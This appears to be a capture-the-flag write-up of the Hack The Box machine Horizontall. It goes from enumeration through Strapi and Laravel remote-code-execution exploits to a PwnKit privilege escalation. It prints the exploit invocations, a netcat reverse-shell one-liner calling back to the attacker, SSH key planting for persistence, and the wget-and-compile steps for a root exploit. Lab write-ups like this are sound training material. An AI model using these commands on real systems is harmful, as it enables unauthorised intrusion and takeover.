# Horizontall

## Nmap

```
sudo nmap 10.10.11.105 -p- -sS -sV                                                                                      

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

{% hint style="info" %}
Add horizontall.htb to /etc/hosts.
{% endhint %}

Starting out we see a custom webpage running on Nginx. After running through directory enumeration we are unable to pull any interesting results.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdWjvTFHo6mAHsrXqfiOb%2Fimage.png?alt=media\&token=70c7cf2e-fa1d-401a-8573-dd8c43970201)

Checking the network requests manually we do see some .js

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FWWUUdu8dFWsh3XZz9VW2%2Fimage.png?alt=media\&token=6a023681-fae9-4d54-a496-68c6287a0cbc)

Browsing manually to one of the requests we see a large amount of code within the application script.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhUPx9h28M074iOUF8Ndq%2Fimage.png?alt=media\&token=e10a39e5-2f4e-4beb-9b7d-f48a7c43bf2c)

Using `CyberChef` we able to extract any information which may be of interest to us. In this case a sub domain URL.

**Cyberchef:** <https://gchq.github.io/CyberChef/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUTvULN39PiuYmwWAl5ja%2Fimage.png?alt=media\&token=6edccda2-7c7c-4bf8-be38-6d26768e3404)

{% hint style="info" %}
Add api-prod.horizontall.htb to /etc/hosts.
{% endhint %}

After adding *api-prod.horizontall.htb* to our hosts file we are then able to browse to the root page as shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZUVjgsKF93lrTOLBj79y%2Fimage.png?alt=media\&token=60f9cd27-7b86-4e13-aff1-d14bc2ee8b40)

`Feroxbuster` reveals an */Admin* directory which redirects to a Strapi login page.

```
feroxbuster -u http://api-prod.horizontall.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhpYWo8BWNHwgB6Ju9jOm%2Fimage.png?alt=media\&token=a47526f0-9170-4ecd-a0cc-4015f08cce8e)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fo1G6s7DCjEPnTqQA6YY8%2Fimage.png?alt=media\&token=896608a3-3dea-4cfe-96b4-0a4c0af37e94)

Using `searchsploit` we are able to determine an unauthenticated `RCE` exists for version *3.0.0-beta.17.4*.

```bash
searchsploit -w "strapi"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIiPv6IbUEfKTESu8uQq2%2Fimage.png?alt=media\&token=89bd05c2-3b96-4421-989d-d4e49ba9207a)

Checking the current version of Strapi with `curl` to determine if we are working with a vulnerable version.

```bash
curl "http://api-prod.horizontall.htb/admin/init"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHa5a4agChDkn9aT97e9m%2Fimage.png?alt=media\&token=c0d6e216-bb31-42e4-b3a9-11b7ccf53667)

The following exploit linked below allows a password reset for the admin account and a JWT to be generated which will be required for the next exploit.

**Github:** <https://www.exploit-db.com/exploits/50239> **(CVE-2019-18818)**

**NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2019-18818>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fqq935B1VFo3qmUPQnY5o%2Fimage.png?alt=media\&token=c8648a7b-a65e-47e7-a975-ea0ca591c247)

With the generated JWT token we can now perform the authenticated RCE exploit and gain a shell on the target system. (Remember to set up a netcat listener on port 9001 first.)

**Github:** <https://github.com/z9fr/CVE-2019-19609/blob/main/exploit.py> **(CVE-2019-19609)**

**NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2019-19609>

```
python3 exploit.py <rhost> <lhost> <jwt> <url>
python3 exploit.py api-prod.horizontall.htb 10.10.14.14 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQ0NTI2ODgzLCJleHAiOjE2NDcxMTg4ODN9.2t51kjz4yTrHHUYHG3Ag799fLWiHLspwzccAX5bdsW0 http://api-prod.horizontall.htb/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFoqA5KBEJMwAs7TkLGzO%2Fimage.png?alt=media\&token=8b85d235-3fb4-4b7d-8300-3fe71923d050)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDvrqCsP9pFtzWDWRpIRl%2Fimage.png?alt=media\&token=16d1a1b7-5c81-40bf-9efe-7c7b44bb68e4)

For the next part we set up a `SSH` connection to allow easier exploitation of the target system.

**SSH**

For `SSH` access create a .ssh directory in the *strapi* user home location and generate an `SSH` key and an authorized\_keys file.

```bash
# Create .ssh folder in /opt/strapi
mkdir /opt/strapi/.ssh

# Generate SSH key
ssh-keygen #Hit enter until complete

# Create authorized_keys file
touch authorized_keys

# echo contnets of id_rsa.pub into authorized_keys
echo "<Contents of id_rsa.pub>" > authroized_keys

# Next, copy id_rsa to the attacking system and SSH in as the strapi user.
ssh -i id_rsa strapi@10.10.11.105
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUXFaQcvmeapDYvihuLbp%2Fimage.png?alt=media\&token=0fc33c0b-7b10-4628-bbcb-d4ef3863fb45)

Now in via SSH and after performing some basic enumeration we see some interesting results for internal services running.

```bash
netstat -auntp
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDRQ8Fa8K6WMB13t3LYwo%2Fimage.png?alt=media\&token=26119c1f-0f88-4202-9883-43d1cbcdf6e1)

Checking out what is running on the local ports with `curl` we see that under port 8000 Laravel v8 is running.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FeVWuaX7qU4UCjDboVcOs%2Fimage.png?alt=media\&token=9501b8ba-05e3-4224-8782-4e8fe323af36)

According to `searchsploit` Laravel v8 may be vulnerable to `RCE`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FR8ZmLGqmuoOhf0l52JpI%2Fimage.png?alt=media\&token=6250196b-e67a-4cf8-9954-ba34a066d81e)

In order to make the Laravel web page available to our attacking system we need to forward the internal port to our remote attacking host. With the SSH connection now setup we can reuse this as shown below:

**SSH forward remote port to local port**

```bash
ssh -i id_rsa strapi@10.10.11.105 -L 8000:127.0.0.1:8000
```

From which we can access Laravel over localhost on the attacking system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhKTAZNggI7KenBMmD3f1%2Fimage.png?alt=media\&token=c8c25b55-1354-4f72-b2f7-7a9c4799681b)

I did not have much luck with the `searchsploit` suggested PoC. However the PoC linked below worked much better.

**Github:** <https://github.com/nth347/CVE-2021-3129_exploit>

**Usage:**

```
git clone https://github.com/nth347/CVE-2021-3129_exploit.git
cd CVE-2021-3129_exploit
chmod +x exploit.py
./exploit.py http://localhost:8000 Monolog/RCE3 id
```

A reverse shell can be obtained with the following as `nc` is installed on the target system.

```bash
./exploit.py 'http://localhost:8000' Monolog/RCE2 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 9000 >/tmp/f"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCx2MXs55kygbVxSoXtTv%2Fimage.png?alt=media\&token=45b2d97b-554c-42c9-b351-714b2a0173e5)

**Exploit #2 CVE-2021-4034**

**NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2021-4034>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmAbAokNnEQhWTrSAM1F7%2Fimage.png?alt=media\&token=4707b576-527e-4e20-a6c5-765dd06e34fb)

**Github:** <https://github.com/arthepsy/CVE-2021-4034> **(CVE-2021-4034)**

Download the exploit PoC to the target system, compile and execute.

```bash
wget 'http://<IP>/poc.c'
gcc 'poc.c' -o 'exploit'
chmod +x ./exploit
./exploit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FRoB8PpyhXmzBW7cFsDKg%2Fimage.png?alt=media\&token=318a1c52-a286-4e6c-8cae-d741ee94f152)